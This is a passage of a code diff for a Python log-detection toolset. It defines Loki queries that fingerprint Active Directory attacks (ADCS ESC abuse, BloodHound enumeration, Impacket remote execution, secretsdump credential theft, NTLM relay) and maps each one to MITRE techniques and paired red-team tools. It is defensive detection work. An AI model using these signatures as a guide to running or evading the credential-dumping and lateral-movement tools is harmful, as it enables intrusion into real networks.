+ """ + dn.log_metric("query_template_esc1", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC1 indicators: + # - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in template + # - Certificate request with SAN different from requester + # - Event 4886/4887 with suspicious SAN + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4886|4887|certificate.*request|certipy)"' + ' |~ "(?i)(san=|subjectaltname|upn=|enrollee.*supplies|ct_flag)"' + ) + + logger.info(f"ESC1 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc1_attack" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_req_esc1" + result["_severity"] = "critical" + result["_description"] = "ESC1: Enrollee supplies subject - allows impersonation" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc4_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC4 - Vulnerable Certificate Template ACL attack. + + ESC4 exploits misconfigured ACLs on certificate templates where low-priv + users have write access to modify template settings. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC4 attack indicators. 
+ """ + dn.log_metric("query_template_esc4", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC4 involves modifying certificate template attributes + # Event 5136: Directory service object modified (on certificate template) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5136|ldap.*modify|template.*modif)"' + ' |~ "(?i)(pki|certificatetemplate|mspki|enrollmentflag)"' + ) + + logger.info(f"ESC4 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc4_attack" + result["_mitre_technique"] = "T1649" + result["_severity"] = "high" + result["_description"] = "ESC4: Certificate template ACL modification" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc8_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC8 - NTLM Relay to AD CS HTTP Endpoints. + + ESC8 exploits AD CS web enrollment endpoints (certsrv) via NTLM relay. + Attackers coerce authentication then relay to the CA to request certs. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC8 attack indicators. 
+ """ + dn.log_metric("query_template_esc8", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC8 indicators: + # - HTTP requests to /certsrv/certfnsh.asp + # - NTLM relay patterns + # - PetitPotam/PrinterBug coercion followed by cert request + logql = ( + '{job=~".+"}' + ' |~ "(?i)(certsrv|certfnsh|certenroll|ntlmrelayx)"' + ' |~ "(?i)(relay|coerce|petitpotam|printerbug|dfscoerce)"' + ) + + logger.info(f"ESC8 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc8_attack" + result["_mitre_technique"] = "T1649" + result["_severity"] = "critical" + result["_description"] = "ESC8: NTLM relay to AD CS web enrollment" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_certificate_authentication( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect authentication using stolen/forged certificates. + + Detects red team's certipy_auth using certificates for PKINIT auth + to obtain TGTs and NTLM hashes. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with cert auth indicators. 
+ """ + dn.log_metric("query_template_cert_auth", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # PKINIT authentication, certificate-based Kerberos + # Event 4768 with certificate auth + logql = ( + '{job=~".+"}' + ' |~ "(?i)(pkinit|pkca|smartcard|certificate.*auth)"' + ' |~ "(?i)(4768|tgt.*request|kerberos|certipy.*auth)"' + ) + + logger.info(f"Certificate authentication detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "certificate_authentication" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_auth" + + return result + + # ========================================================================= + # BLOODHOUND SPECIFIC LDAP QUERY SIGNATURES + # Maps to: run_bloodhound + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_domain_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound domain trust and forest enumeration. + + BloodHound queries for cross-domain trust relationships and forest + topology to map potential attack paths. + + MITRE ATT&CK: T1482 (Domain Trust Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with domain enum indicators. 
+ """ + dn.log_metric("query_template_bh_domain", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # BloodHound domain enumeration LDAP queries: + # - trusteddomain objectclass queries + # - crossRef objects for forest structure + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(trusteddomain|crossref|trusttype|trustdirection|trustattributes)"' + ) + + logger.info(f"BloodHound domain enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_domain_enum" + result["_mitre_technique"] = "T1482" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_acl_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound ACL/DACL enumeration. + + BloodHound's ACL collection queries for nTSecurityDescriptor on AD + objects to find privilege escalation paths via ACL abuse. + + MITRE ATT&CK: T1069.002 (Permission Groups Discovery: Domain Groups) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ACL enumeration indicators. 
+ """ + dn.log_metric("query_template_bh_acl", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # BloodHound ACL collection LDAP patterns: + # - nTSecurityDescriptor attribute requests + # - Large LDAP queries for DACL + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(ntsecuritydescriptor|dacl|securitydescriptor|allowedtoactonbehalf)"' + ) + + logger.info(f"BloodHound ACL enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_acl_enum" + result["_mitre_technique"] = "T1069.002" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_session_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound session enumeration. + + BloodHound enumerates active user sessions on computers using + NetSessionEnum and NetWkstaUserEnum APIs to map where users are logged in. + + MITRE ATT&CK: T1033 (System Owner/User Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with session enum indicators. 
+ """ + dn.log_metric("query_template_bh_session", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Session enumeration APIs: + # - NetSessionEnum (srvsvc) + # - NetWkstaUserEnum (wkssvc) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(srvsvc|wkssvc|netsession|netwksta)"' + ' |~ "(?i)(enum|bloodhound|sharphound|session.*collection)"' + ) + + logger.info(f"BloodHound session enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_session_enum" + result["_mitre_technique"] = "T1033" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_gpo_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound GPO enumeration. + + BloodHound enumerates Group Policy Objects to find GPO-based attack + paths and privilege escalation opportunities. + + MITRE ATT&CK: T1615 (Group Policy Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with GPO enum indicators. 
+ """ + dn.log_metric("query_template_bh_gpo", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # GPO enumeration queries: + # - groupPolicyContainer objectclass + # - gPLink, gPCFileSysPath attributes + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(grouppolicycontainer|gplink|gpcfilesyspath|gpo)"' + ) + + logger.info(f"BloodHound GPO enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_gpo_enum" + result["_mitre_technique"] = "T1615" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_computer_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound computer enumeration. + + BloodHound queries for computer objects with specific attributes + to identify targets for lateral movement. + + MITRE ATT&CK: T1018 (Remote System Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with computer enum indicators. 
+ """ + dn.log_metric("query_template_bh_computer", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Computer enumeration with BloodHound-specific attributes: + # - operatingsystem, operatingsystemversion + # - serviceprincipalname, msds-allowedtodelegateto + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(objectclass=computer|operatingsystem|serviceprincipalname|allowedtodelegateto)"' + ) + + logger.info(f"BloodHound computer enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_computer_enum" + result["_mitre_technique"] = "T1018" + result["_red_team_tool"] = "run_bloodhound" + + return result + + # ========================================================================= + # IMPACKET TOOL FINGERPRINTS + # Maps to: secretsdump, smbclient, wmiexec, psexec, atexec, dcomexec + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_wmiexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-wmiexec remote execution. + + Wmiexec uses WMI for semi-interactive shell, creating processes via + Win32_Process.Create. Output retrieved via SMB temp files. + + MITRE ATT&CK: T1047 (Windows Management Instrumentation) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with wmiexec indicators. 
+ """ + dn.log_metric("query_template_wmiexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Wmiexec patterns: + # - WMI process creation events + # - cmd.exe /Q /c with output redirection to ADMIN$ + # - __InstanceCreationEvent subscription + logql = ( + '{job=~".+"}' + ' |~ "(?i)(wmi|win32_process|root\\\\cimv2)"' + ' |~ "(?i)(wmiexec|impacket|cmd.*\\/q.*\\/c|127\\.0\\.0\\.1.*admin\\$)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Wmiexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_wmiexec" + result["_mitre_technique"] = "T1047" + result["_red_team_tool"] = "wmiexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_psexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-psexec remote execution. + + Psexec uploads a service executable to ADMIN$ share, creates and starts + a service, then communicates via named pipe. Creates distinctive events. + + MITRE ATT&CK: T1569.002 (Service Execution) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with psexec indicators. 
+ """ + dn.log_metric("query_template_psexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Psexec patterns: + # - Event 7045: Service installed (random 8-char name) + # - Service binary in ADMIN$ or C:\Windows + # - RemComSvc or similar service names + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|service.*install|psexec|remcom)"' + ' |~ "(?i)(admin\\$|\\\\\\\\.*\\\\admin|service.*creat|cmd\\.exe)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Psexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_psexec" + result["_mitre_technique"] = "T1569.002" + result["_red_team_tool"] = "psexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_smbexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-smbexec remote execution. + + Smbexec creates a service that executes commands via cmd.exe with + output redirected to a share file. More stealthy than psexec. + + MITRE ATT&CK: T1569.002 (Service Execution) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with smbexec indicators. 
+ """ + dn.log_metric("query_template_smbexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Smbexec patterns: + # - Service with cmd.exe /Q /c echo command + # - BTOBTO service name pattern (default) + # - Output to C:\__output or __output + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|service|smbexec)"' + ' |~ "(?i)(btobto|cmd.*echo.*\\^>|__output|execute\\.bat)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Smbexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_smbexec" + result["_mitre_technique"] = "T1569.002" + result["_red_team_tool"] = "smbexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_atexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-atexec remote execution. + + Atexec uses the Task Scheduler (ATSVC) to create scheduled tasks + for command execution. Creates Event 4698 (scheduled task created). + + MITRE ATT&CK: T1053.002 (Scheduled Task) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with atexec indicators. 
+ """ + dn.log_metric("query_template_atexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Atexec patterns: + # - Event 4698: Scheduled task created + # - Task name pattern (random characters) + # - cmd.exe /C execution in task + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4698|4699|4700|4701|schtask|taskscheduler|atsvc)"' + ' |~ "(?i)(atexec|impacket|cmd.*\\/c|schtasks)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Atexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_atexec" + result["_mitre_technique"] = "T1053.002" + result["_red_team_tool"] = "atexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_dcomexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-dcomexec remote execution. + + Dcomexec uses DCOM objects (MMC20.Application, ShellWindows, ShellBrowserWindow) + to execute commands remotely. Operates over TCP 135 (RPC). + + MITRE ATT&CK: T1021.003 (DCOM) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with dcomexec indicators. 
+ """ + dn.log_metric("query_template_dcomexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Dcomexec patterns: + # - DCOM/RPC connections + # - MMC20.Application, ShellWindows, ShellBrowserWindow instantiation + # - Process created by mmc.exe or explorer.exe + logql = ( + '{job=~".+"}' + ' |~ "(?i)(dcom|135/tcp|rpc|mmc20|shellwindows|shellbrowser)"' + ' |~ "(?i)(dcomexec|impacket|executeshellcommand|document\\.application)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Dcomexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_dcomexec" + result["_mitre_technique"] = "T1021.003" + result["_red_team_tool"] = "dcomexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_secretsdump_sam( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-secretsdump SAM database dump. + + Secretsdump can dump local SAM database by accessing registry hives + remotely via SMB. Retrieves local account hashes. + + MITRE ATT&CK: T1003.002 (SAM) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with SAM dump indicators. 
+ """ + dn.log_metric("query_template_secretsdump_sam", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # SAM dump patterns: + # - Remote registry access to SAM, SYSTEM, SECURITY hives + # - Event 4663: Object access on registry + # - reg save commands + logql = ( + '{job=~".+"}' + ' |~ "(?i)(registry|hklm|winreg|samr)"' + ' |~ "(?i)(sam|system|security|secretsdump|reg.*save)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"SAM dump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_secretsdump_sam" + result["_mitre_technique"] = "T1003.002" + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_secretsdump_lsa( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-secretsdump LSA secrets dump. + + Secretsdump extracts LSA secrets which may contain service account + passwords, autologon credentials, and other sensitive data. + + MITRE ATT&CK: T1003.004 (LSA Secrets) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with LSA dump indicators. 
+ """ + dn.log_metric("query_template_secretsdump_lsa", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # LSA secrets dump patterns: + # - SECURITY hive access + # - LSA policy queries + # - $MACHINE.ACC, DefaultPassword, NL$KM patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(lsa|security|policy|secrets)"' + ' |~ "(?i)(\\$machine|defaultpassword|nl\\$|dpapi|secretsdump)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"LSA secrets dump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_secretsdump_lsa" + result["_mitre_technique"] = "T1003.004" + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_ntlmrelayx( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-ntlmrelayx NTLM relay attacks. + + Ntlmrelayx intercepts NTLM authentication and relays it to target + services like SMB, LDAP, HTTP for unauthorized access. + + MITRE ATT&CK: T1557.001 (LLMNR/NBT-NS Poisoning and SMB Relay) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with NTLM relay indicators. 
+ """ + dn.log_metric("query_template_ntlmrelayx", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # NTLM relay patterns: + # - Authentication from unexpected source IP + # - Rapid auth attempts with same NTLM challenge + # - SMB signing not required warnings + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ntlm|relay|responder|inveigh)"' + ' |~ "(?i)(ntlmrelayx|smbrelay|signing.*not.*required|coerce)"' + ) + + logger.info(f"NTLM relay detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_ntlmrelayx" + result["_mitre_technique"] = "T1557.001" + result["_red_team_tool"] = "ntlmrelayx" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_smbclient( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-smbclient share access. + + Smbclient provides interactive SMB access for enumeration and + file operations on remote shares. + + MITRE ATT&CK: T1021.002 (SMB/Windows Admin Shares) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with smbclient indicators. 
+ """ + dn.log_metric("query_template_smbclient", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Smbclient patterns: + # - Interactive SMB session characteristics + # - Multiple share enumeration + # - File browsing patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(smb|445/tcp|cifs|smbclient)"' + ' |~ "(?i)(impacket|tree.*connect|shares.*enum|file.*access)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Smbclient detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_smbclient" + result["_mitre_technique"] = "T1021.002" + result["_red_team_tool"] = "smbclient" + + return result + + # ========================================================================= + # HOST/USER INVESTIGATION HELPERS + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_host_activity( + self, + hostname: str, + hours_back: int = 24, + attack_patterns_only: bool = False, + ) -> dict[str, Any]: + """Get all activity for a specific host. + + Comprehensive query to gather logs for a host during investigation. + Can optionally filter to only show attack-related patterns. + + Args: + hostname: Hostname to investigate. + hours_back: Hours of logs to search. + attack_patterns_only: If True, filter for attack patterns only. + + Returns: + All log activity for the specified host. 
+ """ + dn.log_metric("query_template_host_activity", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + if attack_patterns_only: + logql = ( + f'{{hostname=~".*{hostname}.*"}} |~ "(?i)(4625|4624|4662|4769|4768|5140|7045|4688)"' + ) + else: + logql = f'{{hostname=~".*{hostname}.*"}}' + + logger.info(f"Host activity query: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + result["_query_template"] = "host_activity" + result["_target_host"] = hostname + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_user_activity( + self, + username: str, + hours_back: int = 24, + ) -> dict[str, Any]: + """Get all activity for a specific user. + + Comprehensive query to gather all logs mentioning a user account. + + Args: + username: Username to investigate. + hours_back: Hours of logs to search. + + Returns: + All log activity mentioning the specified user. + """ + dn.log_metric("query_template_user_activity", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + logql = f'{{job=~".+"}} |~ "(?i){username}"' + + logger.info(f"User activity query: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + result["_query_template"] = "user_activity" + result["_target_user"] = username + + return result + + # ========================================================================= + # TEMPLATE LISTING + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + def list_query_templates(self) -> list[dict[str, Any]]: + """List all available query templates with MITRE mappings. + + Returns: + List of templates organized by attack phase, with red team tool correlation. 
+ """ + return [ + # Reconnaissance + { + "name": "detect_port_scanning", + "description": "Detect nmap/masscan port scanning", + "mitre": "T1046", + "tactic": "discovery", + "red_team_tool": "nmap_scan", + }, + { + "name": "detect_user_enumeration", + "description": "Detect AD user account enumeration", + "mitre": "T1087.002", + "tactic": "discovery", + "red_team_tool": "enumerate_users", + }, + { + "name": "detect_share_enumeration", + "description": "Detect SMB share discovery", + "mitre": "T1135", + "tactic": "discovery", + "red_team_tool": "enumerate_shares", + }, + # Credential Access + { + "name": "detect_secretsdump", + "description": "Detect credential dumping via secretsdump", + "mitre": "T1003", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_dcsync", + "description": "Detect DCSync attack against domain controller", + "mitre": "T1003.006", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + "severity": "critical", + }, + { + "name": "detect_kerberoasting", + "description": "Detect Kerberoasting TGS ticket requests", + "mitre": "T1558.003", + "tactic": "credential_access", + "red_team_tool": "kerberoast", + }, + { + "name": "detect_asrep_roasting", + "description": "Detect AS-REP roasting attacks", + "mitre": "T1558.004", + "tactic": "credential_access", + "red_team_tool": "asrep_roast", + }, + { + "name": "detect_brute_force", + "description": "Detect brute force/password spray attempts", + "mitre": "T1110", + "tactic": "credential_access", + "red_team_tool": None, + }, + # Lateral Movement + { + "name": "detect_pass_the_hash", + "description": "Detect Pass-the-Hash NTLM attacks", + "mitre": "T1550.002", + "tactic": "lateral_movement", + "red_team_tool": "domain_admin_checker", + }, + { + "name": "detect_lateral_movement", + "description": "Detect PSExec, WMI, WinRM lateral movement", + "mitre": "T1021", + "tactic": "lateral_movement", + "red_team_tool": None, + }, + { + "name": 
"detect_smb_file_access", + "description": "Detect suspicious file access on shares", + "mitre": "T1039", + "tactic": "collection", + "red_team_tool": "download_file_content", + }, + # Privilege Escalation + { + "name": "detect_adcs_exploitation", + "description": "Detect ADCS certificate abuse (ESC1-15)", + "mitre": "T1649", + "tactic": "privilege_escalation", + "red_team_tool": "certipy_*", + "severity": "high", + }, + { + "name": "detect_delegation_abuse", + "description": "Detect RBCD/delegation privilege escalation", + "mitre": "T1134.001", + "tactic": "privilege_escalation", + "red_team_tool": "rbcd_write", + }, + { + "name": "detect_bloodhound_collection", + "description": "Detect BloodHound AD enumeration", + "mitre": "T1087", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + # Persistence + { + "name": "detect_golden_ticket", + "description": "Detect Golden Ticket creation/usage", + "mitre": "T1558.001", + "tactic": "persistence", + "red_team_tool": "generate_golden_ticket", + "severity": "critical", + }, + # Execution + { + "name": "detect_suspicious_execution", + "description": "Detect encoded PowerShell, LOLBins", + "mitre": "T1059", + "tactic": "execution", + "red_team_tool": None, + }, + # ADCS/Certipy Specific (ESC attacks) + { + "name": "detect_certipy_enumeration", + "description": "Detect Certipy certificate template enumeration", + "mitre": "T1649", + "tactic": "discovery", + "red_team_tool": "certipy_find", + }, + { + "name": "detect_esc1_attack", + "description": "Detect ESC1 - Enrollee Supplies Subject attack", + "mitre": "T1649", + "tactic": "privilege_escalation", + "red_team_tool": "certipy_req_esc1", + "severity": "critical", + }, + { + "name": "detect_esc4_attack", + "description": "Detect ESC4 - Certificate template ACL modification", + "mitre": "T1649", + "tactic": "privilege_escalation", + "severity": "high", + }, + { + "name": "detect_esc8_attack", + "description": "Detect ESC8 - NTLM relay to AD CS HTTP endpoints", 
+ "mitre": "T1649", + "tactic": "privilege_escalation", + "severity": "critical", + }, + { + "name": "detect_certificate_authentication", + "description": "Detect authentication using stolen/forged certificates", + "mitre": "T1649", + "tactic": "credential_access", + "red_team_tool": "certipy_auth", + }, + # BloodHound Specific LDAP Queries + { + "name": "detect_bloodhound_domain_enum", + "description": "Detect BloodHound domain trust enumeration", + "mitre": "T1482", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_acl_enum", + "description": "Detect BloodHound ACL/DACL collection", + "mitre": "T1069.002", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_session_enum", + "description": "Detect BloodHound session enumeration (NetSessionEnum)", + "mitre": "T1033", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_gpo_enum", + "description": "Detect BloodHound GPO enumeration", + "mitre": "T1615", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_computer_enum", + "description": "Detect BloodHound computer object enumeration", + "mitre": "T1018", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + # Impacket Tool Fingerprints + { + "name": "detect_impacket_wmiexec", + "description": "Detect impacket-wmiexec WMI remote execution", + "mitre": "T1047", + "tactic": "execution", + "red_team_tool": "wmiexec", + }, + { + "name": "detect_impacket_psexec", + "description": "Detect impacket-psexec service-based execution", + "mitre": "T1569.002", + "tactic": "execution", + "red_team_tool": "psexec", + }, + { + "name": "detect_impacket_smbexec", + "description": "Detect impacket-smbexec stealthy service execution", + "mitre": "T1569.002", + "tactic": "execution", + "red_team_tool": "smbexec", + }, + { + "name": "detect_impacket_atexec", + "description": "Detect 
impacket-atexec scheduled task execution", + "mitre": "T1053.002", + "tactic": "execution", + "red_team_tool": "atexec", + }, + { + "name": "detect_impacket_dcomexec", + "description": "Detect impacket-dcomexec DCOM remote execution", + "mitre": "T1021.003", + "tactic": "lateral_movement", + "red_team_tool": "dcomexec", + }, + { + "name": "detect_impacket_secretsdump_sam", + "description": "Detect secretsdump SAM database extraction", + "mitre": "T1003.002", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_impacket_secretsdump_lsa", + "description": "Detect secretsdump LSA secrets extraction", + "mitre": "T1003.004", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_impacket_ntlmrelayx", + "description": "Detect NTLM relay attacks (ntlmrelayx)", + "mitre": "T1557.001", + "tactic": "credential_access", + "red_team_tool": "ntlmrelayx", + }, + { + "name": "detect_impacket_smbclient", + "description": "Detect impacket-smbclient share access", + "mitre": "T1021.002", + "tactic": "lateral_movement", + "red_team_tool": "smbclient", + }, + # Investigation Helpers + { + "name": "get_host_activity", + "description": "Get all activity for a specific host", + "mitre": None, + "tactic": "investigation", + "red_team_tool": None, + }, + { + "name": "get_user_activity", + "description": "Get all activity for a specific user", + "mitre": None, + "tactic": "investigation", + "red_team_tool": None, + }, + ] diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py index af318b19..4773c0be 100644 --- a/src/ares/tools/red/network.py +++ b/src/ares/tools/red/network.py @@ -2,12 +2,11 @@ This module provides toolsets for network enumeration, credential harvesting, password cracking, share pilfering, and golden ticket generation. + +All tools execute commands remotely on the Kali attack box via AWS SSM. 
